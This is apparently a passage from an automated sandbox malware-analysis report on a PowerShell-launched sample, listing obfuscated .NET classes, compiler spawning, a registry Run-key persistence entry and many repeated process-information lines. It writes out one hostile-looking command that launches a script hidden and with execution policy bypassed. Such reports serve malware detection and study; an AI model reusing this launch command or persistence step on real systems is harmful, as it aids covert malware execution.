                    Source: Binary string: ClassLibrary1.pdb source: powershell.exe, 00000000.00000002.1897758677.000001C2CE4E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000000.00000002.1883635223.000001C2C68BC000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: ClassLibrary1.pdb8 source: powershell.exe, 00000000.00000002.1897758677.000001C2CE4E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000000.00000002.1883635223.000001C2C68BC000.00000004.00000800.00020000.00000000.sdmp

                    Data Obfuscation

                    Source: 0.2.powershell.exe.1c2ce4e0000.2.raw.unpack, g0M3PEOvGOmW9l4ffki.cs | .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                    Source: 0.2.powershell.exe.1c2c6965ce0.1.raw.unpack, g0M3PEOvGOmW9l4ffki.cs | .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                    Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -NOP -WIND HIDDEN -eXEC BYPASS -NONI "C:\ProgramData\PDF\PDF2.ps1"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 0_2_00007FFD9B8800BD pushad ; iretd 0_2_00007FFD9B8800C1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 0_2_00007FFD9B888FF2 push FFFFFFE8h; ret 0_2_00007FFD9B888FF9
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 0_2_00007FFD9B88D6AA push cs; ret 0_2_00007FFD9B88D6C7
                    Source: 0.2.powershell.exe.1c2ce4e0000.2.raw.unpack, Class1.cs | High entropy of concatenated method names: 'cSAthpF4q', 'BOA2PRCtE', 'tYabmA30h', 'pTKP9IMri', 'wi1WuIcZX', 'lGM7L0uUo', 'IRXGT8rNp', 'rcSIlKjDx', 'CuM4370cF', 'oflQqQ9pd'
                    Source: 0.2.powershell.exe.1c2ce4e0000.2.raw.unpack, bgdjQDs74EtOPCyOnc9.cs | High entropy of concatenated method names: 'ztJRZrWr4a', 'K90RsN0ip4', 'TVoRqHCp3v', 'akUR5gUVxg', 'E0rRTe5IDX', 'wNFRHPocfa', 'U7oRyf6lHv', 'WuEqZ2VqRN', 'Ou5R6aBt7f', 'YL5RRASrwO'
                    Source: 0.2.powershell.exe.1c2ce4e0000.2.raw.unpack, npfGFrAepxjjv4umNO.cs | High entropy of concatenated method names: 'Equals', 'GetHashCode', 'FmT0bHnWB', 'ToString', 'p4mLwFNhb', 'nWY9S3nUn', 'oseCHUCWU9c0LVx917l', 'MdXtvCC71GIt7mZcyMN', 'ttixWqCGM4jIQ4p80sH', 'cV1P8uCIT75RvPTTmnG'
                    Source: 0.2.powershell.exe.1c2ce4e0000.2.raw.unpack, g0M3PEOvGOmW9l4ffki.cs | High entropy of concatenated method names: 'oXvqawAJnXAG2CkbW5J', 'bjv4ebAOSFAlevNOxLW', 'Qn6Z1gmbcG', 'u5Vtx4A5qBcKwIV5QMO', 'ty2sw7ATn0Z42iKQpHN', 'POdg9nAHLwKLRQfwFU8', 'SQwAgDAyMHdFgP5t1qK', 'CWR6GGA6mIbV1rdPKRw', 'tcBqMmARfsS6ElEbqDn', 'MjacT49Ikb'
                    Source: 0.2.powershell.exe.1c2c6965ce0.1.raw.unpack, Class1.cs | High entropy of concatenated method names: 'cSAthpF4q', 'BOA2PRCtE', 'tYabmA30h', 'pTKP9IMri', 'wi1WuIcZX', 'lGM7L0uUo', 'IRXGT8rNp', 'rcSIlKjDx', 'CuM4370cF', 'oflQqQ9pd'
                    Source: 0.2.powershell.exe.1c2c6965ce0.1.raw.unpack, bgdjQDs74EtOPCyOnc9.cs | High entropy of concatenated method names: 'ztJRZrWr4a', 'K90RsN0ip4', 'TVoRqHCp3v', 'akUR5gUVxg', 'E0rRTe5IDX', 'wNFRHPocfa', 'U7oRyf6lHv', 'WuEqZ2VqRN', 'Ou5R6aBt7f', 'YL5RRASrwO'
                    Source: 0.2.powershell.exe.1c2c6965ce0.1.raw.unpack, npfGFrAepxjjv4umNO.cs | High entropy of concatenated method names: 'Equals', 'GetHashCode', 'FmT0bHnWB', 'ToString', 'p4mLwFNhb', 'nWY9S3nUn', 'oseCHUCWU9c0LVx917l', 'MdXtvCC71GIt7mZcyMN', 'ttixWqCGM4jIQ4p80sH', 'cV1P8uCIT75RvPTTmnG'
                    Source: 0.2.powershell.exe.1c2c6965ce0.1.raw.unpack, g0M3PEOvGOmW9l4ffki.cs | High entropy of concatenated method names: 'oXvqawAJnXAG2CkbW5J', 'bjv4ebAOSFAlevNOxLW', 'Qn6Z1gmbcG', 'u5Vtx4A5qBcKwIV5QMO', 'ty2sw7ATn0Z42iKQpHN', 'POdg9nAHLwKLRQfwFU8', 'SQwAgDAyMHdFgP5t1qK', 'CWR6GGA6mIbV1rdPKRw', 'tcBqMmARfsS6ElEbqDn', 'MjacT49Ikb'

                    Boot Survival

                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run D
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
